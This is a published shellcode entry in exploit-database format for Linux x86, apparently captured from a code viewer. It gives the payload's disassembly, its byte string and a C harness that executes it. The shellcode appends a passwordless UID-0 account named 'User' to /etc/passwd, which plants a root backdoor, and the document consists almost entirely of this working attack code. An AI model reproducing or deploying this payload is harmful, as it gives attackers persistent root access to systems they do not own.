61 lines
No EOL
1.7 KiB
C
61 lines
No EOL
1.7 KiB
C
# Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode (74 bytes)
|
|
# Date: 2019-10-12
|
|
# Author: bolonobolo
|
|
# Vendor Homepage: None
|
|
# Software Link: None
|
|
# Tested on: Linux x86
|
|
# Comments: add user "User" to /etc/passwd
|
|
# CVE: N/A
|
|
|
|
/*
|
|
00000000 31DB xor ebx,ebx
|
|
00000002 31C9 xor ecx,ecx
|
|
00000004 66B90104 mov cx,0x401
|
|
00000008 F7E3 mul ebx
|
|
0000000A 53 push ebx
|
|
0000000B 6873737764 push dword 0x64777373
|
|
00000010 68632F7061 push dword 0x61702f63
|
|
00000015 682F2F6574 push dword 0x74652f2f
|
|
0000001A 8D1C24 lea ebx,[esp]
|
|
0000001D B005 mov al,0x5
|
|
0000001F CD80 int 0x80
|
|
00000021 93 xchg eax,ebx
|
|
00000022 F7E2 mul edx
|
|
00000024 686E2F7368 push dword 0x68732f6e
|
|
00000029 683A2F6269 push dword 0x69622f3a
|
|
0000002E 68303A3A2F push dword 0x2f3a3a30
|
|
00000033 683A3A303A push dword 0x3a303a3a
|
|
00000038 6855736572 push dword 0x72657355
|
|
0000003D 8D0C24 lea ecx,[esp]
|
|
00000040 B214 mov dl,0x14
|
|
00000042 B004 mov al,0x4
|
|
00000044 CD80 int 0x80
|
|
00000046 2C13 sub al,0x13
|
|
00000048 CD80 int 0x80
|
|
|
|
|
|
|
|
*/
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char code[] = \
|
|
"\x31\xdb\x31\xc9\x66\xb9\x01\x04\xf7\xe3\x53"
|
|
"\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68"
|
|
"\x2f\x2f\x65\x74\x8d\x1c\x24\xb0\x05\xcd\x80"
|
|
"\x93\xf7\xe2\x68\x6e\x2f\x73\x68\x68\x3a\x2f"
|
|
"\x62\x69\x68\x30\x3a\x3a\x2f\x68\x3a\x3a\x30"
|
|
"\x3a\x68\x55\x73\x65\x72\x8d\x0c\x24\xb2\x14"
|
|
"\xb0\x04\xcd\x80\x2c\x13\xcd\x80";
|
|
|
|
void main()
|
|
{
|
|
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
|
|
int (*ret)() = (int(*)())code;
|
|
|
|
ret();
|
|
|
|
} |